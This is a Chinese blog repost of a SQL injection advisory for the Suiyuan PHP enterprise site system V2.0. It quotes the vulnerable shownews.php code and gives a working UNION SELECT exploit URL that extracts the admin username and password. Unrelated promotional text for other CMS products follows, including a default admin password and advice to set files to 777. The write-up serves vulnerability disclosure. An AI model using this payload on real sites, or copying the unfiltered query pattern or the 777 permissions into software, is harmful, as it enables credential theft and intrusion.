shownews.php,随缘php企业网站管理系统V2.0 shownews.php注入漏洞

随缘网络php企业网站管理系统2.0免费版存在安全漏洞,主要体现在SQL注入问题上。程序在处理$id$参数时未经过滤直接用于SQL查询,攻击者可以构造恶意SQL语句获取敏感信息。例如,通过示例中的exploit,可以尝试获取管理员的用户名和密码。该漏洞可能导致数据泄露,影响网站安全性。
摘要由CSDN通过智能技术生成

程序名称:随缘网络php企业网站管理系统2.0免费版

以下为系统的功能简介:

1、采用div+css布局经测试兼容IE及firefox主流浏览器,其他浏览器暂未测试。

2、产品新闻三级无限分类。

3、后台可设置诸如管理员帐号密码,网站标题,网站底部版权等信息。

4、后台采用最新版xhEditor编辑器,xhEditor是一个基于jQuery开发的跨平台开源迷你XHTML编辑器组件。

5、后台图片栏目可以对相关的幻灯,友情链接,logo,banner等进行修改设置。

5、后台可批量删除产品新闻。

漏洞文件 shownews.php,以下是程序部分代码:

{$id=$_GET["id"];

}else{echo "";exit;

}$sql4="select * from news where id=$id"; //未经过滤将id变量直接带入sql查询语句中,输出到$sql4变量中

$result4=mysql_query($sql4); //将$sql4变量赋值到$result4变量中

if($nums=mysql_num_rows($result4)) //返回$result4变量结果,意味着$title变量,$content变量会显示出我们构造的恶意注入语句结果

{$rs4=mysql_fetch_array($result4);$title=$rs4["title"];$content=$rs4["content"];$hits=$rs4["hits"];$fbsj=date("Y-m-d",strtotime($rs4[‘fbsj‘]));$sql="update news set hits=hits+1 where id=$id";mysql_query($sql);

}else{echo "";exit;

}?>

漏洞exp:

http://192.168.1.5/websitetempeltest/qywphp2/shownews.php?id=5 and 1=2 UNION SELECT 1,2,unhex(hex(concat(0x5e5e5e,username,0x7c,password,0x5e5e5e))),4,5,6,7 from gly

原文:http://www.cnblogs.com/17bdw/p/3928239.html

旅游网站系统是一一款基于B/S构架的旅游网站管理系统,集成旅游线路、自由行、度假酒店、旅游景区、自驾租车、婚纱摄影、高尔夫产品等模块为一体的旅游行业网站系统,适用于全国各大旅行社、旅游服务公司、旅游会议服务公司及旅游经理人等开展网络业务营销推广、客户一体化管理使用的旅游网站系统。   旅游系统采用微软成熟的编程语言Asp+Mssql/Access开发,采用Web2.0 Css+Div模板架构风格布局,度假产品展示功能非常强大,并注重于强大和操作便捷等特点,尤其适合没有操作经验的用户使用,是专门为各大旅行社和旅游服务公司打造的高效、重量级的旅游网站平台。   旅游网站系统特点:全站功能强大,度假产品信息详细,便捷的度假产品展示、酒店房价体系按日期展示,可随时修改某天的价格,对于节价日房价展示非常方便、全站度假产品统一预订系统、便捷、高效,批量生成订单、度假产品评分和用户在线咨询功能方便与用户交流和回复信息等。 旅游网站系统系统包括的主要模块: 旅游线路展示 酒店信息及房型价格展示 旅游景区 自驾租车 高尔夫信息 婚纱摄影 新闻资讯 会员平台 会员积分兑换商品 在线咨询平台 产品评价及评分 广告展示系统等功能模块 本系统适用对象:   旅行社、旅游公司、酒店旅馆、景区、以及从事旅游相关行业的个人等,以及想拥有一个强大的旅游行业网站的公司或个人均可使用。
Yourphp网站管理系统,是一款完全开源免费的PHP+MYSQL系统.核心采用了Thinkphp框架等众多开源软件,同时核心功能也作为开源软件发布。 集众多开源项目于一身的特点,使本系统从安全,效率,易用及可扩展性上更加突出.程序内置SEO优化机制,使企业网站更容易被推广.拥有企业网站常用的模块功能(企业简介模块、新闻模块、产品模块、下载模块、图片模块、招聘模块、在线留言、友情链接、会员与权限管理)。 Yourphp 3.0 企业网站管理系统是一款完全免费的PHP+MYSQL系统.核心采用了Thinkphp框架高度精减而成。模板标签统一化,性能和功能更强大。 Yourphp 企业网站管理系统的兼容性,模块化,可操作性很不错。对于技术与非技术人员都不错。 全新安装:将压缩包内的所有文件上传到空间,运行网站地址便可以自动安装!并设置全部文件和文件夹为可读取权限,linux系统下都设置为777 注意事项: 1.安装完系统后先要进入后台->更新缓存. 2.安装为子目录时请不要使用yourphp为子目录名称. 3.安装在子目录下时请先进后台修复栏目数据和更新缓存,更新网站->更新内容页URL三步操作后,前台栏目链接和css栏目才可以正确显示. 后台访问地址 http://你的域名/admin.php 默认管理员帐号密码:yourphp Yourphp v3.0 正式版更新内容: 重写thinkphp内核,全新的模板解析 修复2.x版本安全漏洞 , 增加充值和财务管理 修复2.x版本的多处bug
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值